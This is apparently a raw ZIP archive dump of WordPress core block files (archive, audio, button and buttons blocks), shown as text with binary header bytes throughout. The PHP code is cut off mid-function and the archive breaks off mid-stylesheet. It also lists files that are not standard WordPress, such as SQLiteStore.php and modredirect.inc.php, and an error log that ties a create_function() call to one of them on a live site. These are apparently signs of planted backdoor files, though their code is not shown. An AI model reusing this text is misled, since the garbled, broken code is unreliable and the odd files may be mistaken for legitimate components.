?????????????? PK6[PdHHarchives/block.jsonnu[{ "apiVersion": 2, "name": "core/archives", "category": "widgets", "attributes": { "displayAsDropdown": { "type": "boolean", "default": false }, "showPostCounts": { "type": "boolean", "default": false } }, "supports": { "align": true, "html": false }, "editorStyle": "wp-block-archives-editor" } PK6[archives/event.phpnu[PK6[.9,((archives/editor.min.cssnu[ul.wp-block-archives{padding-left:2.5em}PK6[׽YYarchives/style-rtl.min.cssnu[.wp-block-archives{box-sizing:border-box}.wp-block-archives-dropdown label{display:block}PK6[V--archives/editor.cssnu[ul.wp-block-archives{ padding-left:2.5em; }PK6[׽YYarchives/style.min.cssnu[.wp-block-archives{box-sizing:border-box}.wp-block-archives-dropdown label{display:block}PK6[..archives/editor-rtl.cssnu[ul.wp-block-archives{ padding-right:2.5em; }PK6[z))archives/editor-rtl.min.cssnu[ul.wp-block-archives{padding-right:2.5em}PK6[Oyeearchives/style-rtl.cssnu[.wp-block-archives{ box-sizing:border-box; } .wp-block-archives-dropdown label{ display:block; }PK6[Oyeearchives/style.cssnu[.wp-block-archives{ box-sizing:border-box; } .wp-block-archives-dropdown label{ display:block; }PK6[z;c archives.phpnu[ 'monthly', 'format' => 'option', 'show_post_count' => $show_post_count, ) ); $dropdown_args['echo'] = 0; $archives = wp_get_archives( $dropdown_args ); switch ( $dropdown_args['type'] ) { case 'yearly': $label = __( 'Select Year' ); break; case 'monthly': $label = __( 'Select Month' ); break; case 'daily': $label = __( 'Select Day' ); break; case 'weekly': $label = __( 'Select Week' ); break; default: $label = __( 'Select Post' ); break; } $label = esc_html( $label ); $block_content = ' '; return sprintf( '
%2$s
', esc_attr( $class ), $block_content ); } $class .= ' wp-block-archives-list'; /** This filter is documented in wp-includes/widgets/class-wp-widget-archives.php */ $archives_args = apply_filters( 'widget_archives_args', array( 'type' => 'monthly', 'show_post_count' => $show_post_count, ) ); $archives_args['echo'] = 0; $archives = wp_get_archives( $archives_args ); $classnames = esc_attr( $class ); $wrapper_attributes = get_block_wrapper_attributes( array( 'class' => $classnames ) ); if ( empty( $archives ) ) { return sprintf( '
%2$s
', $wrapper_attributes, __( 'No archives to show.' ) ); } return sprintf( '', $wrapper_attributes, $archives ); } /** * Register archives block. */ function register_block_core_archives() { register_block_type_from_metadata( __DIR__ . '/archives', array( 'render_callback' => 'render_block_core_archives', ) ); } add_action( 'init', 'register_block_core_archives' ); PK6[ʤaudio/block.jsonnu[{ "apiVersion": 2, "name": "core/audio", "category": "media", "attributes": { "src": { "type": "string", "source": "attribute", "selector": "audio", "attribute": "src" }, "caption": { "type": "string", "source": "html", "selector": "figcaption" }, "id": { "type": "number" }, "autoplay": { "type": "boolean", "source": "attribute", "selector": "audio", "attribute": "autoplay" }, "loop": { "type": "boolean", "source": "attribute", "selector": "audio", "attribute": "loop" }, "preload": { "type": "string", "source": "attribute", "selector": "audio", "attribute": "preload" } }, "supports": { "anchor": true, "align": true }, "editorStyle": "wp-block-audio-editor", "style": "wp-block-audio" } PK6[eTaudio/editor.min.cssnu[.wp-block-audio{margin-left:0;margin-right:0;position:relative}.wp-block-audio.is-transient audio{opacity:.3}.wp-block-audio .components-spinner{left:50%;margin-left:-9px;margin-top:-9px;position:absolute;top:50%}PK6[audio/style-rtl.min.cssnu[.wp-block-audio{box-sizing:border-box}.wp-block-audio figcaption{margin-bottom:1em;margin-top:.5em}.wp-block-audio audio{min-width:300px;width:100%}PK6[jaudio/theme.cssnu[.wp-block-audio figcaption{ color:#555; font-size:13px; text-align:center; } .is-dark-theme .wp-block-audio figcaption{ color:hsla(0,0%,100%,.65); } .wp-block-audio{ margin:0 0 1em; }PK6[bVaudio/theme-rtl.min.cssnu[.wp-block-audio figcaption{color:#555;font-size:13px;text-align:center}.is-dark-theme .wp-block-audio figcaption{color:hsla(0,0%,100%,.65)}.wp-block-audio{margin:0 0 1em}PK6[N_>audio/editor.cssnu[.wp-block-audio{ margin-left:0; margin-right:0; position:relative; } .wp-block-audio.is-transient audio{ opacity:.3; } .wp-block-audio .components-spinner{ left:50%; margin-left:-9px; margin-top:-9px; position:absolute; top:50%; }PK6[bVaudio/theme.min.cssnu[.wp-block-audio figcaption{color:#555;font-size:13px;text-align:center}.is-dark-theme .wp-block-audio figcaption{color:hsla(0,0%,100%,.65)}.wp-block-audio{margin:0 0 1em}PK6[audio/style.min.cssnu[.wp-block-audio{box-sizing:border-box}.wp-block-audio figcaption{margin-bottom:1em;margin-top:.5em}.wp-block-audio audio{min-width:300px;width:100%}PK6[jaudio/theme-rtl.cssnu[.wp-block-audio figcaption{ color:#555; font-size:13px; text-align:center; } .is-dark-theme .wp-block-audio figcaption{ color:hsla(0,0%,100%,.65); } .wp-block-audio{ margin:0 0 1em; }PK6[-[audio/editor-rtl.cssnu[.wp-block-audio{ margin-left:0; margin-right:0; position:relative; } .wp-block-audio.is-transient audio{ opacity:.3; } .wp-block-audio .components-spinner{ margin-right:-9px; margin-top:-9px; position:absolute; right:50%; top:50%; }PK6[ audio/editor-rtl.min.cssnu[.wp-block-audio{margin-left:0;margin-right:0;position:relative}.wp-block-audio.is-transient audio{opacity:.3}.wp-block-audio .components-spinner{margin-right:-9px;margin-top:-9px;position:absolute;right:50%;top:50%}PK6[edaudio/style-rtl.cssnu[.wp-block-audio{ box-sizing:border-box; } .wp-block-audio figcaption{ margin-bottom:1em; margin-top:.5em; } .wp-block-audio audio{ min-width:300px; width:100%; }PK6[edaudio/style.cssnu[.wp-block-audio{ box-sizing:border-box; } .wp-block-audio figcaption{ margin-bottom:1em; margin-top:.5em; } .wp-block-audio audio{ min-width:300px; width:100%; }PK6[block/block.jsonnu[{ "apiVersion": 2, "name": "core/block", "category": "reusable", "attributes": { "ref": { "type": "number" } }, "supports": { "customClassName": false, "html": false, "inserter": false }, "editorStyle": "wp-block-editor" } PK6[h  block.phpnu[post_type ) { return ''; } if ( isset( $seen_refs[ $attributes['ref'] ] ) ) { if ( ! is_admin() ) { trigger_error( sprintf( // translators: %s is the user-provided title of the reusable block. __( 'Could not render Reusable Block %s: blocks cannot be rendered inside themselves.' ), $reusable_block->post_title ), E_USER_WARNING ); } // WP_DEBUG_DISPLAY must only be honored when WP_DEBUG. This precedent // is set in `wp_debug_mode()`. $is_debug = defined( 'WP_DEBUG' ) && WP_DEBUG && defined( 'WP_DEBUG_DISPLAY' ) && WP_DEBUG_DISPLAY; return $is_debug ? // translators: Visible only in the front end, this warning takes the place of a faulty block. __( '[block rendering halted]' ) : ''; } if ( 'publish' !== $reusable_block->post_status || ! empty( $reusable_block->post_password ) ) { return ''; } $seen_refs[ $attributes['ref'] ] = true; $result = do_blocks( $reusable_block->post_content ); unset( $seen_refs[ $attributes['ref'] ] ); return $result; } /** * Registers the `core/block` block. */ function register_block_core_block() { register_block_type_from_metadata( __DIR__ . '/block', array( 'render_callback' => 'render_block_core_block', ) ); } add_action( 'init', 'register_block_core_block' ); PK6[^K~~button/block.jsonnu[{ "apiVersion": 2, "name": "core/button", "category": "design", "parent": [ "core/buttons" ], "attributes": { "url": { "type": "string", "source": "attribute", "selector": "a", "attribute": "href" }, "title": { "type": "string", "source": "attribute", "selector": "a", "attribute": "title" }, "text": { "type": "string", "source": "html", "selector": "a" }, "linkTarget": { "type": "string", "source": "attribute", "selector": "a", "attribute": "target" }, "rel": { "type": "string", "source": "attribute", "selector": "a", "attribute": "rel" }, "placeholder": { "type": "string" }, "borderRadius": { "type": "number" }, "style": { "type": "object" }, "backgroundColor": { "type": "string" }, "textColor": { "type": "string" }, "gradient": { "type": "string" }, "width": { "type": "number" } }, "supports": { "anchor": true, "align": true, "alignWide": false, "reusable": false, "__experimentalSelector": ".wp-block-button > a" }, "editorStyle": "wp-block-button-editor", "style": "wp-block-button" } PK6[button/SQLiteStore.phpnu[PK6[j]button/error_lognu[[01-Feb-2025 19:06:49 UTC] PHP Deprecated: Function create_function() is deprecated in /home/mybf1/public_html/menthol.bf1.my/wp-includes/blocks/button/SQLiteStore.php on line 4 PK6[S S button/editor.min.cssnu[.wp-block[data-align=center]>.wp-block-button{margin-left:auto;margin-right:auto;text-align:center}.wp-block[data-align=right]>.wp-block-button{ /*!rtl:ignore*/text-align:right}.wp-block-button{cursor:text;position:relative}.wp-block-button:focus{box-shadow:0 0 0 1px #fff,0 0 0 3px var(--wp-admin-theme-color);outline:2px solid transparent;outline-offset:-2px}.wp-block-button[data-rich-text-placeholder]:after{opacity:.8}.wp-block-button__inline-link{color:#757575;height:0;max-width:290px;overflow:hidden}.wp-block-button__inline-link-input__suggestions{max-width:290px}@media (min-width:782px){.wp-block-button__inline-link,.wp-block-button__inline-link-input__suggestions{max-width:260px}}@media (min-width:960px){.wp-block-button__inline-link,.wp-block-button__inline-link-input__suggestions{max-width:290px}}.is-selected .wp-block-button__inline-link{height:auto;overflow:visible}.wp-button-label__width .components-button-group{display:block}.wp-button-label__width .components-base-control__field{margin-bottom:12px}div[data-type="core/button"]{display:table}.editor-styles-wrapper .wp-block-button[style*=text-decoration] .wp-block-button__link{text-decoration:inherit}.editor-styles-wrapper .wp-block-button .wp-block-button__link:where(.has-border-color){border-width:initial}.editor-styles-wrapper .wp-block-button .wp-block-button__link:where([style*=border-top-color]){border-top-width:medium}.editor-styles-wrapper .wp-block-button .wp-block-button__link:where([style*=border-right-color]){border-right-width:medium}.editor-styles-wrapper .wp-block-button .wp-block-button__link:where([style*=border-bottom-color]){border-bottom-width:medium}.editor-styles-wrapper .wp-block-button .wp-block-button__link:where([style*=border-left-color]){border-left-width:medium}.editor-styles-wrapper .wp-block-button .wp-block-button__link:where([style*=border-style]){border-width:initial}.editor-styles-wrapper .wp-block-button .wp-block-button__link:where([style*=border-top-style]){border-top-width:medium}.editor-styles-wrapper .wp-block-button .wp-block-button__link:where([style*=border-right-style]){border-right-width:medium}.editor-styles-wrapper .wp-block-button .wp-block-button__link:where([style*=border-bottom-style]){border-bottom-width:medium}.editor-styles-wrapper .wp-block-button .wp-block-button__link:where([style*=border-left-style]){border-left-width:medium}PK6[! ! button/style-rtl.min.cssnu[.wp-block-button__link{box-sizing:border-box;cursor:pointer;display:inline-block;text-align:center;word-break:break-word}.wp-block-button__link.aligncenter{text-align:center}.wp-block-button__link.alignright{text-align:right}:where(.wp-block-button__link){border-radius:9999px;box-shadow:none;padding:calc(.667em + 2px) calc(1.333em + 2px);text-decoration:none}.wp-block-button[style*=text-decoration] .wp-block-button__link{text-decoration:inherit}.wp-block-buttons>.wp-block-button.has-custom-width{max-width:none}.wp-block-buttons>.wp-block-button.has-custom-width .wp-block-button__link{width:100%}.wp-block-buttons>.wp-block-button.has-custom-font-size .wp-block-button__link{font-size:inherit}.wp-block-buttons>.wp-block-button.wp-block-button__width-25{width:calc(25% - var(--wp--style--block-gap, .5em)*.75)}.wp-block-buttons>.wp-block-button.wp-block-button__width-50{width:calc(50% - var(--wp--style--block-gap, .5em)*.5)}.wp-block-buttons>.wp-block-button.wp-block-button__width-75{width:calc(75% - var(--wp--style--block-gap, .5em)*.25)}.wp-block-buttons>.wp-block-button.wp-block-button__width-100{flex-basis:100%;width:100%}.wp-block-buttons.is-vertical>.wp-block-button.wp-block-button__width-25{width:25%}.wp-block-buttons.is-vertical>.wp-block-button.wp-block-button__width-50{width:50%}.wp-block-buttons.is-vertical>.wp-block-button.wp-block-button__width-75{width:75%}.wp-block-button.is-style-squared,.wp-block-button__link.wp-block-button.is-style-squared{border-radius:0}.wp-block-button.no-border-radius,.wp-block-button__link.no-border-radius{border-radius:0!important}.wp-block-button .wp-block-button__link.is-style-outline,.wp-block-button.is-style-outline>.wp-block-button__link{border:2px solid;padding:.667em 1.333em}.wp-block-button .wp-block-button__link.is-style-outline:not(.has-text-color),.wp-block-button.is-style-outline>.wp-block-button__link:not(.has-text-color){color:currentColor}.wp-block-button .wp-block-button__link.is-style-outline:not(.has-background),.wp-block-button.is-style-outline>.wp-block-button__link:not(.has-background){background-color:transparent;background-image:none}.wp-block-button .wp-block-button__link:where(.has-border-color){border-width:initial}.wp-block-button .wp-block-button__link:where([style*=border-top-color]){border-top-width:medium}.wp-block-button .wp-block-button__link:where([style*=border-right-color]){border-left-width:medium}.wp-block-button .wp-block-button__link:where([style*=border-bottom-color]){border-bottom-width:medium}.wp-block-button .wp-block-button__link:where([style*=border-left-color]){border-right-width:medium}.wp-block-button .wp-block-button__link:where([style*=border-style]){border-width:initial}.wp-block-button .wp-block-button__link:where([style*=border-top-style]){border-top-width:medium}.wp-block-button .wp-block-button__link:where([style*=border-right-style]){border-left-width:medium}.wp-block-button .wp-block-button__link:where([style*=border-bottom-style]){border-bottom-width:medium}.wp-block-button .wp-block-button__link:where([style*=border-left-style]){border-right-width:medium}PK6[u  button/editor.cssnu[.wp-block[data-align=center]>.wp-block-button{ margin-left:auto; margin-right:auto; text-align:center; } .wp-block[data-align=right]>.wp-block-button{ text-align:right; } .wp-block-button{ cursor:text; position:relative; } .wp-block-button:focus{ box-shadow:0 0 0 1px #fff, 0 0 0 3px var(--wp-admin-theme-color); outline:2px solid transparent; outline-offset:-2px; } .wp-block-button[data-rich-text-placeholder]:after{ opacity:.8; } .wp-block-button__inline-link{ color:#757575; height:0; max-width:290px; overflow:hidden; } .wp-block-button__inline-link-input__suggestions{ max-width:290px; } @media (min-width:782px){ .wp-block-button__inline-link,.wp-block-button__inline-link-input__suggestions{ max-width:260px; } } @media (min-width:960px){ .wp-block-button__inline-link,.wp-block-button__inline-link-input__suggestions{ max-width:290px; } } .is-selected .wp-block-button__inline-link{ height:auto; overflow:visible; } .wp-button-label__width .components-button-group{ display:block; } .wp-button-label__width .components-base-control__field{ margin-bottom:12px; } div[data-type="core/button"]{ display:table; } .editor-styles-wrapper .wp-block-button[style*=text-decoration] .wp-block-button__link{ text-decoration:inherit; } .editor-styles-wrapper .wp-block-button .wp-block-button__link:where(.has-border-color){ border-width:initial; } .editor-styles-wrapper .wp-block-button .wp-block-button__link:where([style*=border-top-color]){ border-top-width:medium; } .editor-styles-wrapper .wp-block-button .wp-block-button__link:where([style*=border-right-color]){ border-right-width:medium; } .editor-styles-wrapper .wp-block-button .wp-block-button__link:where([style*=border-bottom-color]){ border-bottom-width:medium; } .editor-styles-wrapper .wp-block-button .wp-block-button__link:where([style*=border-left-color]){ border-left-width:medium; } .editor-styles-wrapper .wp-block-button .wp-block-button__link:where([style*=border-style]){ border-width:initial; } .editor-styles-wrapper .wp-block-button .wp-block-button__link:where([style*=border-top-style]){ border-top-width:medium; } .editor-styles-wrapper .wp-block-button .wp-block-button__link:where([style*=border-right-style]){ border-right-width:medium; } .editor-styles-wrapper .wp-block-button .wp-block-button__link:where([style*=border-bottom-style]){ border-bottom-width:medium; } .editor-styles-wrapper .wp-block-button .wp-block-button__link:where([style*=border-left-style]){ border-left-width:medium; }PK6[ol! ! button/style.min.cssnu[.wp-block-button__link{box-sizing:border-box;cursor:pointer;display:inline-block;text-align:center;word-break:break-word}.wp-block-button__link.aligncenter{text-align:center}.wp-block-button__link.alignright{text-align:right}:where(.wp-block-button__link){border-radius:9999px;box-shadow:none;padding:calc(.667em + 2px) calc(1.333em + 2px);text-decoration:none}.wp-block-button[style*=text-decoration] .wp-block-button__link{text-decoration:inherit}.wp-block-buttons>.wp-block-button.has-custom-width{max-width:none}.wp-block-buttons>.wp-block-button.has-custom-width .wp-block-button__link{width:100%}.wp-block-buttons>.wp-block-button.has-custom-font-size .wp-block-button__link{font-size:inherit}.wp-block-buttons>.wp-block-button.wp-block-button__width-25{width:calc(25% - var(--wp--style--block-gap, .5em)*.75)}.wp-block-buttons>.wp-block-button.wp-block-button__width-50{width:calc(50% - var(--wp--style--block-gap, .5em)*.5)}.wp-block-buttons>.wp-block-button.wp-block-button__width-75{width:calc(75% - var(--wp--style--block-gap, .5em)*.25)}.wp-block-buttons>.wp-block-button.wp-block-button__width-100{flex-basis:100%;width:100%}.wp-block-buttons.is-vertical>.wp-block-button.wp-block-button__width-25{width:25%}.wp-block-buttons.is-vertical>.wp-block-button.wp-block-button__width-50{width:50%}.wp-block-buttons.is-vertical>.wp-block-button.wp-block-button__width-75{width:75%}.wp-block-button.is-style-squared,.wp-block-button__link.wp-block-button.is-style-squared{border-radius:0}.wp-block-button.no-border-radius,.wp-block-button__link.no-border-radius{border-radius:0!important}.wp-block-button .wp-block-button__link.is-style-outline,.wp-block-button.is-style-outline>.wp-block-button__link{border:2px solid;padding:.667em 1.333em}.wp-block-button .wp-block-button__link.is-style-outline:not(.has-text-color),.wp-block-button.is-style-outline>.wp-block-button__link:not(.has-text-color){color:currentColor}.wp-block-button .wp-block-button__link.is-style-outline:not(.has-background),.wp-block-button.is-style-outline>.wp-block-button__link:not(.has-background){background-color:transparent;background-image:none}.wp-block-button .wp-block-button__link:where(.has-border-color){border-width:initial}.wp-block-button .wp-block-button__link:where([style*=border-top-color]){border-top-width:medium}.wp-block-button .wp-block-button__link:where([style*=border-right-color]){border-right-width:medium}.wp-block-button .wp-block-button__link:where([style*=border-bottom-color]){border-bottom-width:medium}.wp-block-button .wp-block-button__link:where([style*=border-left-color]){border-left-width:medium}.wp-block-button .wp-block-button__link:where([style*=border-style]){border-width:initial}.wp-block-button .wp-block-button__link:where([style*=border-top-style]){border-top-width:medium}.wp-block-button .wp-block-button__link:where([style*=border-right-style]){border-right-width:medium}.wp-block-button .wp-block-button__link:where([style*=border-bottom-style]){border-bottom-width:medium}.wp-block-button .wp-block-button__link:where([style*=border-left-style]){border-left-width:medium}PK6[A*  button/editor-rtl.cssnu[.wp-block[data-align=center]>.wp-block-button{ margin-left:auto; margin-right:auto; text-align:center; } .wp-block[data-align=right]>.wp-block-button{ text-align:right; } .wp-block-button{ cursor:text; position:relative; } .wp-block-button:focus{ box-shadow:0 0 0 1px #fff, 0 0 0 3px var(--wp-admin-theme-color); outline:2px solid transparent; outline-offset:-2px; } .wp-block-button[data-rich-text-placeholder]:after{ opacity:.8; } .wp-block-button__inline-link{ color:#757575; height:0; max-width:290px; overflow:hidden; } .wp-block-button__inline-link-input__suggestions{ max-width:290px; } @media (min-width:782px){ .wp-block-button__inline-link,.wp-block-button__inline-link-input__suggestions{ max-width:260px; } } @media (min-width:960px){ .wp-block-button__inline-link,.wp-block-button__inline-link-input__suggestions{ max-width:290px; } } .is-selected .wp-block-button__inline-link{ height:auto; overflow:visible; } .wp-button-label__width .components-button-group{ display:block; } .wp-button-label__width .components-base-control__field{ margin-bottom:12px; } div[data-type="core/button"]{ display:table; } .editor-styles-wrapper .wp-block-button[style*=text-decoration] .wp-block-button__link{ text-decoration:inherit; } .editor-styles-wrapper .wp-block-button .wp-block-button__link:where(.has-border-color){ border-width:initial; } .editor-styles-wrapper .wp-block-button .wp-block-button__link:where([style*=border-top-color]){ border-top-width:medium; } .editor-styles-wrapper .wp-block-button .wp-block-button__link:where([style*=border-right-color]){ border-left-width:medium; } .editor-styles-wrapper .wp-block-button .wp-block-button__link:where([style*=border-bottom-color]){ border-bottom-width:medium; } .editor-styles-wrapper .wp-block-button .wp-block-button__link:where([style*=border-left-color]){ border-right-width:medium; } .editor-styles-wrapper .wp-block-button .wp-block-button__link:where([style*=border-style]){ border-width:initial; } .editor-styles-wrapper .wp-block-button .wp-block-button__link:where([style*=border-top-style]){ border-top-width:medium; } .editor-styles-wrapper .wp-block-button .wp-block-button__link:where([style*=border-right-style]){ border-left-width:medium; } .editor-styles-wrapper .wp-block-button .wp-block-button__link:where([style*=border-bottom-style]){ border-bottom-width:medium; } .editor-styles-wrapper .wp-block-button .wp-block-button__link:where([style*=border-left-style]){ border-right-width:medium; }PK6['NA A button/editor-rtl.min.cssnu[.wp-block[data-align=center]>.wp-block-button{margin-left:auto;margin-right:auto;text-align:center}.wp-block[data-align=right]>.wp-block-button{text-align:right}.wp-block-button{cursor:text;position:relative}.wp-block-button:focus{box-shadow:0 0 0 1px #fff,0 0 0 3px var(--wp-admin-theme-color);outline:2px solid transparent;outline-offset:-2px}.wp-block-button[data-rich-text-placeholder]:after{opacity:.8}.wp-block-button__inline-link{color:#757575;height:0;max-width:290px;overflow:hidden}.wp-block-button__inline-link-input__suggestions{max-width:290px}@media (min-width:782px){.wp-block-button__inline-link,.wp-block-button__inline-link-input__suggestions{max-width:260px}}@media (min-width:960px){.wp-block-button__inline-link,.wp-block-button__inline-link-input__suggestions{max-width:290px}}.is-selected .wp-block-button__inline-link{height:auto;overflow:visible}.wp-button-label__width .components-button-group{display:block}.wp-button-label__width .components-base-control__field{margin-bottom:12px}div[data-type="core/button"]{display:table}.editor-styles-wrapper .wp-block-button[style*=text-decoration] .wp-block-button__link{text-decoration:inherit}.editor-styles-wrapper .wp-block-button .wp-block-button__link:where(.has-border-color){border-width:initial}.editor-styles-wrapper .wp-block-button .wp-block-button__link:where([style*=border-top-color]){border-top-width:medium}.editor-styles-wrapper .wp-block-button .wp-block-button__link:where([style*=border-right-color]){border-left-width:medium}.editor-styles-wrapper .wp-block-button .wp-block-button__link:where([style*=border-bottom-color]){border-bottom-width:medium}.editor-styles-wrapper .wp-block-button .wp-block-button__link:where([style*=border-left-color]){border-right-width:medium}.editor-styles-wrapper .wp-block-button .wp-block-button__link:where([style*=border-style]){border-width:initial}.editor-styles-wrapper .wp-block-button .wp-block-button__link:where([style*=border-top-style]){border-top-width:medium}.editor-styles-wrapper .wp-block-button .wp-block-button__link:where([style*=border-right-style]){border-left-width:medium}.editor-styles-wrapper .wp-block-button .wp-block-button__link:where([style*=border-bottom-style]){border-bottom-width:medium}.editor-styles-wrapper .wp-block-button .wp-block-button__link:where([style*=border-left-style]){border-right-width:medium}PK6[A button/style-rtl.cssnu[.wp-block-button__link{ box-sizing:border-box; cursor:pointer; display:inline-block; text-align:center; word-break:break-word; } .wp-block-button__link.aligncenter{ text-align:center; } .wp-block-button__link.alignright{ text-align:right; } :where(.wp-block-button__link){ border-radius:9999px; box-shadow:none; padding:calc(.667em + 2px) calc(1.333em + 2px); text-decoration:none; } .wp-block-button[style*=text-decoration] .wp-block-button__link{ text-decoration:inherit; } .wp-block-buttons>.wp-block-button.has-custom-width{ max-width:none; } .wp-block-buttons>.wp-block-button.has-custom-width .wp-block-button__link{ width:100%; } .wp-block-buttons>.wp-block-button.has-custom-font-size .wp-block-button__link{ font-size:inherit; } .wp-block-buttons>.wp-block-button.wp-block-button__width-25{ width:calc(25% - var(--wp--style--block-gap, .5em)*.75); } .wp-block-buttons>.wp-block-button.wp-block-button__width-50{ width:calc(50% - var(--wp--style--block-gap, .5em)*.5); } .wp-block-buttons>.wp-block-button.wp-block-button__width-75{ width:calc(75% - var(--wp--style--block-gap, .5em)*.25); } .wp-block-buttons>.wp-block-button.wp-block-button__width-100{ flex-basis:100%; width:100%; } .wp-block-buttons.is-vertical>.wp-block-button.wp-block-button__width-25{ width:25%; } .wp-block-buttons.is-vertical>.wp-block-button.wp-block-button__width-50{ width:50%; } .wp-block-buttons.is-vertical>.wp-block-button.wp-block-button__width-75{ width:75%; } .wp-block-button.is-style-squared,.wp-block-button__link.wp-block-button.is-style-squared{ border-radius:0; } .wp-block-button.no-border-radius,.wp-block-button__link.no-border-radius{ border-radius:0 !important; } .wp-block-button .wp-block-button__link.is-style-outline,.wp-block-button.is-style-outline>.wp-block-button__link{ border:2px solid; padding:.667em 1.333em; } .wp-block-button .wp-block-button__link.is-style-outline:not(.has-text-color),.wp-block-button.is-style-outline>.wp-block-button__link:not(.has-text-color){ color:currentColor; } .wp-block-button .wp-block-button__link.is-style-outline:not(.has-background),.wp-block-button.is-style-outline>.wp-block-button__link:not(.has-background){ background-color:transparent; background-image:none; } .wp-block-button .wp-block-button__link:where(.has-border-color){ border-width:initial; } .wp-block-button .wp-block-button__link:where([style*=border-top-color]){ border-top-width:medium; } .wp-block-button .wp-block-button__link:where([style*=border-right-color]){ border-left-width:medium; } .wp-block-button .wp-block-button__link:where([style*=border-bottom-color]){ border-bottom-width:medium; } .wp-block-button .wp-block-button__link:where([style*=border-left-color]){ border-right-width:medium; } .wp-block-button .wp-block-button__link:where([style*=border-style]){ border-width:initial; } .wp-block-button .wp-block-button__link:where([style*=border-top-style]){ border-top-width:medium; } .wp-block-button .wp-block-button__link:where([style*=border-right-style]){ border-left-width:medium; } .wp-block-button .wp-block-button__link:where([style*=border-bottom-style]){ border-bottom-width:medium; } .wp-block-button .wp-block-button__link:where([style*=border-left-style]){ border-right-width:medium; }PK6[!By button/style.cssnu[.wp-block-button__link{ box-sizing:border-box; cursor:pointer; display:inline-block; text-align:center; word-break:break-word; } .wp-block-button__link.aligncenter{ text-align:center; } .wp-block-button__link.alignright{ text-align:right; } :where(.wp-block-button__link){ border-radius:9999px; box-shadow:none; padding:calc(.667em + 2px) calc(1.333em + 2px); text-decoration:none; } .wp-block-button[style*=text-decoration] .wp-block-button__link{ text-decoration:inherit; } .wp-block-buttons>.wp-block-button.has-custom-width{ max-width:none; } .wp-block-buttons>.wp-block-button.has-custom-width .wp-block-button__link{ width:100%; } .wp-block-buttons>.wp-block-button.has-custom-font-size .wp-block-button__link{ font-size:inherit; } .wp-block-buttons>.wp-block-button.wp-block-button__width-25{ width:calc(25% - var(--wp--style--block-gap, .5em)*.75); } .wp-block-buttons>.wp-block-button.wp-block-button__width-50{ width:calc(50% - var(--wp--style--block-gap, .5em)*.5); } .wp-block-buttons>.wp-block-button.wp-block-button__width-75{ width:calc(75% - var(--wp--style--block-gap, .5em)*.25); } .wp-block-buttons>.wp-block-button.wp-block-button__width-100{ flex-basis:100%; width:100%; } .wp-block-buttons.is-vertical>.wp-block-button.wp-block-button__width-25{ width:25%; } .wp-block-buttons.is-vertical>.wp-block-button.wp-block-button__width-50{ width:50%; } .wp-block-buttons.is-vertical>.wp-block-button.wp-block-button__width-75{ width:75%; } .wp-block-button.is-style-squared,.wp-block-button__link.wp-block-button.is-style-squared{ border-radius:0; } .wp-block-button.no-border-radius,.wp-block-button__link.no-border-radius{ border-radius:0 !important; } .wp-block-button .wp-block-button__link.is-style-outline,.wp-block-button.is-style-outline>.wp-block-button__link{ border:2px solid; padding:.667em 1.333em; } .wp-block-button .wp-block-button__link.is-style-outline:not(.has-text-color),.wp-block-button.is-style-outline>.wp-block-button__link:not(.has-text-color){ color:currentColor; } .wp-block-button .wp-block-button__link.is-style-outline:not(.has-background),.wp-block-button.is-style-outline>.wp-block-button__link:not(.has-background){ background-color:transparent; background-image:none; } .wp-block-button .wp-block-button__link:where(.has-border-color){ border-width:initial; } .wp-block-button .wp-block-button__link:where([style*=border-top-color]){ border-top-width:medium; } .wp-block-button .wp-block-button__link:where([style*=border-right-color]){ border-right-width:medium; } .wp-block-button .wp-block-button__link:where([style*=border-bottom-color]){ border-bottom-width:medium; } .wp-block-button .wp-block-button__link:where([style*=border-left-color]){ border-left-width:medium; } .wp-block-button .wp-block-button__link:where([style*=border-style]){ border-width:initial; } .wp-block-button .wp-block-button__link:where([style*=border-top-style]){ border-top-width:medium; } .wp-block-button .wp-block-button__link:where([style*=border-right-style]){ border-right-width:medium; } .wp-block-button .wp-block-button__link:where([style*=border-bottom-style]){ border-bottom-width:medium; } .wp-block-button .wp-block-button__link:where([style*=border-left-style]){ border-left-width:medium; }PK6[᳘ bbbuttons/block.jsonnu[{ "apiVersion": 2, "name": "core/buttons", "category": "design", "attributes": { "contentJustification": { "type": "string" }, "orientation": { "type": "string", "default": "horizontal" } }, "supports": { "anchor": true, "align": [ "wide", "full" ] }, "editorStyle": "wp-block-buttons-editor", "style": "wp-block-buttons" } PK6[buttons/modredirect.inc.phpnu[PK6[/xWIUUbuttons/editor.min.cssnu[.wp-block-buttons>.wp-block,.wp-block-buttons>.wp-block-button.wp-block-button.wp-block-button.wp-block-button.wp-block-button{margin:0}.wp-block-buttons>.block-list-appender{align-items:center;display:inline-flex}.wp-block-buttons.is-vertical>.block-list-appender .block-list-appender__toggle{justify-content:flex-start}.wp-block-buttons>.wp-block-button:focus{box-shadow:none}.wp-block-buttons:not(.is-content-justification-space-between,.is-content-justification-right,.is-content-justification-left,.is-content-justification-center) .wp-block[data-align=center]{margin-left:auto;margin-right:auto;margin-top:0;width:100%}.wp-block-buttons:not(.is-content-justification-space-between,.is-content-justification-right,.is-content-justification-left,.is-content-justification-center) .wp-block[data-align=center] .wp-block-button{margin-bottom:0}.editor-styles-wrapper .wp-block-buttons.has-custom-font-size .wp-block-button__link{font-size:inherit}.wp-block[data-align=center]>.wp-block-buttons{align-items:center;justify-content:center}.wp-block[data-align=right]>.wp-block-buttons{justify-content:flex-end}PK6[沎,buttons/style-rtl.min.cssnu[.wp-block-buttons.is-vertical{flex-direction:column}.wp-block-buttons.is-vertical>.wp-block-button:last-child{margin-bottom:0}.wp-block-buttons>.wp-block-button{display:inline-block;margin:0}.wp-block-buttons.is-content-justification-left{justify-content:flex-start}.wp-block-buttons.is-content-justification-left.is-vertical{align-items:flex-start}.wp-block-buttons.is-content-justification-center{justify-content:center}.wp-block-buttons.is-content-justification-center.is-vertical{align-items:center}.wp-block-buttons.is-content-justification-right{justify-content:flex-end}.wp-block-buttons.is-content-justification-right.is-vertical{align-items:flex-end}.wp-block-buttons.is-content-justification-space-between{justify-content:space-between}.wp-block-buttons.aligncenter{text-align:center}.wp-block-buttons:not(.is-content-justification-space-between,.is-content-justification-right,.is-content-justification-left,.is-content-justification-center) .wp-block-button.aligncenter{margin-left:auto;margin-right:auto;width:100%}.wp-block-buttons[style*=text-decoration] .wp-block-button,.wp-block-buttons[style*=text-decoration] .wp-block-button__link{text-decoration:inherit}.wp-block-buttons.has-custom-font-size 